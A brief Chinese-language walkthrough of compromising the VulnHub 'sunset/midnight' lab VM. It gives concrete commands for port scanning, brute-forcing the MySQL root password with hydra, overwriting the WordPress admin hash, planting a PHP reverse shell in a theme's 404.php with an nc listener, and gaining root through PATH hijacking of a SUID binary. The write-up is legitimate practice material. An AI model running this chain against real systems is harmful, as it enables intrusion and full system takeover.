今天实践的是vulnhub的sunset/midnight镜像，

下载地址，https://download.vulnhub.com/sunset/midnight.7z，

先是用workstation导入，做地址扫描没扫到地址，

于是又用virtualbox导入，重新做地址扫描，

sudo netdiscover -r 192.168.0.0/24，这回有地址了，195就是，

再继续做端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.0.195，

有web服务，浏览器访问http://192.168.0.195，转到了域名访问，

把域名和IP添加到hosts文件，再次浏览器访问http://sunset-midnight，

做一下目录暴破，dirb http://sunset-midnight，发现了后台url，

浏览器访问http://sunset-midnight/login，需要用户名密码，

之前端口扫描的时候还看到有mysql服务，可以做个root账户的密码暴破，

hydra -l root -P /usr/share/wordlists/rockyou.txt sunset-midnight mysql -t 4，获取到root/robert，

访问mysql服务，mysql -h sunset-midnight -u root -probert，

查看到了后台管理员的账号密码，密码是md5的，

自己造一个密码，123456，在线转成md5的，

更新后台管理员的密码，update wp_users set user_pass='e10adc3949ba59abbe56e057f20f883e' where id=1;

用admin/123456登录后台管理url，

根据以往经验，找到可以上传反弹shell内容的页面，

把kali攻击机上/usr/share/webshells/php/php-reverse-shell.php的内容贴上，并修改好kali攻击机的地址和端口，保存成功，

kali攻击机这边开个反弹shell监听，nc -lvp 4444，

浏览器访问http://sunset-midnight/wp-content/themes/twentynineteen/404.php，反弹shell这就过来了，不是root权限，需要提权，

转成交互式shell，python3 -c "import pty;pty.spawn('/bin/bash')"，

从/var/www/html/wordpress/wp-config.php中查看到用户名密码，

jose/645dc5a8871d2a4269d4cbe23f6ae103，

切到jose，查找root权限执行的程序，find / -perm -u=s 2>/dev/null，

从status程序中搜索service命令，strings /usr/bin/status | grep service，

做个新的环境变量路径，export PATH=/tmp/:$PATH，造个新的service，

cd /tmp，echo "/bin/sh" > service，给可执行权限，chmod +x service，

执行status程序，/usr/bin/status，获取到新的shell，id确认是root，